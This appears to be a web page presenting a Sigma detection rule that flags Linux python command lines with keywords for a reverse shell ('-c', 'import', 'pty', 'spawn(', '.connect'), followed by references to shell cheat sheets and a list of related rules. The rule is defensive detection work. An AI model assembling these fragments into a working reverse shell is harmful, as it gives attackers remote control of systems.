Potential Python Reverse Shell
Detects executing python with keywords related to network activity that could indicate a potential reverse shell
Sigma rule (View on GitHub)
1title: Potential Python Reverse Shell
2id: 32e62bc7-3de0-4bb1-90af-532978fe42c0
3related:
4 - id: c4042d54-110d-45dd-a0e1-05c47822c937
5 type: similar
6status: test
7description: Detects executing python with keywords related to network activity that could indicate a potential reverse shell
8references:
9 - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
10 - https://www.revshells.com/
11author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)'
12date: 2023-04-24
13tags:
14 - attack.execution
15logsource:
16 category: process_creation
17 product: linux
18detection:
19 selection:
20 Image|contains: 'python'
21 CommandLine|contains|all:
22 - ' -c '
23 - 'import'
24 - 'pty'
25 - 'spawn('
26 - '.connect'
27 condition: selection
28falsepositives:
29 - Unknown
30level: high
References
Related rules
- AADInternals PowerShell Cmdlets Execution - ProccessCreation
- AADInternals PowerShell Cmdlets Execution - PsScript
- AMSI Bypass Pattern Assembly GetType
- APT29 2018 Phishing Campaign CommandLine Indicators
- AWS EC2 Startup Shell Script Change